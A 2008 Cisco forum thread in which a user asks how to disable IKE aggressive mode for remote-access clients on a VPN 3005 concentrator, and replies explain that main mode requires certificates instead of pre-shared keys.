IKE Aggressive Mode on VPN3K

Answered Question
May 23rd, 2008
User Badges:

Hi,


I have VPN 3005 with 4.7.2 OS (latest one to date). I am looking to disable Aggressive Mode processing (stick to Main Mode only) for Remove VPN clients. Please note, Remote VPN clients and NOT LAN-to-LAN connections.


So far I cannot see how this can be done.


TAC engineer is not coming up with good answers as well.


Anyhow has an idea?


Thanks!

David

Correct Answer by cisco24x7 about 9 years 4 days ago

I don't think you can make Remote Access VPN on

the Concentrator work with Main mode, unless

you decide to use Certificate instead of

pre-shared key:


"The Cisco VPN client uses aggressive mode if preshared keys are used and uses main mode when public key infrastructure (PKI) is used during Phase 1 of the tunnel negotiations. After bringing up the Internet Security Association and Key Management Protocol Security Association (ISAKMP SA) for secure communication, the Cisco VPN 3000 concentrator prompts the user to specify the user credentials. In this phase, also known as X-Auth or extended authentication, the VPN 3000 concentrator validates the user against the configured authentication database. If the user authentication is successful, the Cisco concentrator sends a successful authentication message back to the client. After X-Auth, the Cisco VPN client requests configuration parameters such as the assigned IP address, the Domain Name System (DNS) server's IP address, and the Windows Internet Naming Service (WINS) server's IP address. During this phase, known as mode-config, the VPN 3000 concentrator sends the configured parameters back to the client. The final step for a successful VPN tunnel is the negotiation of Phase 2 parameters"



  • 1
  • 2
  • 3
  • 4
  • 5
Overall Rating: 5 (1 ratings)
Loading.
michael.leblanc Fri, 05/23/2008 - 16:47
User Badges:
  • Silver, 250 points or more

I'm not familiar with the hardware you are using, but sometimes knowing the commands used on one platform can help you figure out what is required on another.


In an IOS environment, the following command would accomplish the desired result:


#crypto isakmp aggressive-mode disable


Unfortunately, that's the best I can do.


cisco24x7 Mon, 05/26/2008 - 17:41
User Badges:
  • Silver, 250 points or more

Configuration | Policy Management | Traffic Management | Security Associations | Modify


this will allow to select whether you want to have IKE in either aggressive or Main

mode. The default mode is "Main"



dknov Mon, 05/26/2008 - 19:27
User Badges:

Hi,


Thank you for your response, however this setting impacts only LAN-to-LAN tunnels and have no effect on Remote Access VPN, which is what I need (I had already verified this option)


Thanks,

David

Correct Answer
cisco24x7 Tue, 05/27/2008 - 03:44
User Badges:
  • Silver, 250 points or more

I don't think you can make Remote Access VPN on

the Concentrator work with Main mode, unless

you decide to use Certificate instead of

pre-shared key:


"The Cisco VPN client uses aggressive mode if preshared keys are used and uses main mode when public key infrastructure (PKI) is used during Phase 1 of the tunnel negotiations. After bringing up the Internet Security Association and Key Management Protocol Security Association (ISAKMP SA) for secure communication, the Cisco VPN 3000 concentrator prompts the user to specify the user credentials. In this phase, also known as X-Auth or extended authentication, the VPN 3000 concentrator validates the user against the configured authentication database. If the user authentication is successful, the Cisco concentrator sends a successful authentication message back to the client. After X-Auth, the Cisco VPN client requests configuration parameters such as the assigned IP address, the Domain Name System (DNS) server's IP address, and the Windows Internet Naming Service (WINS) server's IP address. During this phase, known as mode-config, the VPN 3000 concentrator sends the configured parameters back to the client. The final step for a successful VPN tunnel is the negotiation of Phase 2 parameters"



dknov Tue, 05/27/2008 - 11:20
User Badges:

Thanks a lot. I was looking for this statement from Cisco on VPN3K not being able to handle Main Mode with XAUTH....


Can you send me the link you took this from?

Actions

This Discussion